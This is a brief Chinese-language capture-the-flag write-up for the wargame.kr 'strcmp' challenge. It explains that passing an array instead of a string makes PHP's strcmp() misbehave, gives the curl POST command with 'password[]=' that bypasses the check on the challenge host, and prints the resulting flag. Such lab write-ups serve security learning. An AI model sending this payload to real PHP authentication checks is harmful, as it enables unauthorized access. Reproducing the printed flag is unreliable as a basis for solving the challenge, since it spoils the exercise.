[wargame.kr]strcmp#
題目
if you can bypass the strcmp function, you get the flag.
查看原始碼
這是 PHP strcmp 漏洞,strcmp()在比較兩個字串時,如果相等就會回傳 0,提供 NULL 或 array 可能會讓 strcmp() 運行異常。
curl -X POST http://host1.dreamhack.games:9344/ -d "password[]="
DH{aede9e7fa4ccb8225f12040a16bdfd37c0c5d2f0}
